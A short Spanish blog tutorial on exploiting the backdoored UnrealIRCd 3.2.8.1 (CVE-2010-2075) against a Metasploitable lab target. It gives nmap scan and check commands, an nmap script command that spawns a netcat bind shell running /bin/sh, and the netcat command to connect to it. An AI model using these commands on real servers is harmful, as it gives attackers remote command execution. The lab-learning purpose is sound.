Centro de Investigación Informática Lazarus

Xplotando con Nmap servidorIRC

Xplotando con Nmap

Servidor IRC Unreal3.2.8.1 vulnerables ataques fulminante.(Explotando la Vulnerabilidad con Nmap y NetCat bajo Metasplotaible)
se ha detectado continuidad en la instalación de esta versión así como la no actualización por parte de los administradores de red. Esta puerta trasera permitía a cualquier persona ejecutar diversos comandos con los privilegios del usuario ejecutando IRC. La puerta trasera era ejecutada sin importar las restricciones del usuario.

A pesar que se ha ha alertado del problema , analiza tu red en busca de vulnerabilidades.

UnrealIRCd es un servidor IRC Open Source, sirviendo miles de redes desde 1999. Se ejecuta en Linux, OS X y Windows. En el mes de noviembre del año 2009 el archivo de nombre “Unreal3.2.8.1.tar.gz” fue reemplazado por una versión conteniendo una puerta trasera (troyano). a pesar de estar en la versión 4.0.11, se ha detectado continuidad en la instalación de esta versión así como la no actualización por parte de los administradores de red. Esta puerta trasera permitía a cualquier persona ejecutar diversos comandos con los privilegios del usuario ejecutando IRC. La puerta trasera era ejecutada sin importar las restricciones del usuario.

información de la vulnerabilidad.

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2075

—————————————————————-
explotacion de la vulnerabilidad usando Metasplotable , Nmap y Netcat

nmap -n -sV -O -v 192.168.0.102

nmap -n -v -p 6667 –script=irc-unrealircd-backdoor.nse 192.168.0.102 (saber si es vulnerable)

nmap -n -Pn -p 6667 –script=irc-unrealircd-backdoor.nse –script-args=irc-unrealircd-backdoor.command=’nc -l -p 7777 -e /bin/sh’ 192.168.0.102 (explotando con Nmap)

nc -n -vv 192.168.0.102 7777

———————————————————————

usando metasploit lanzando el exploit unreal_ircd_3281_backdoor

Deja una respuesta

¿Conoces el Grupo Lazarus?

× ¿Cómo puedo ayudarte?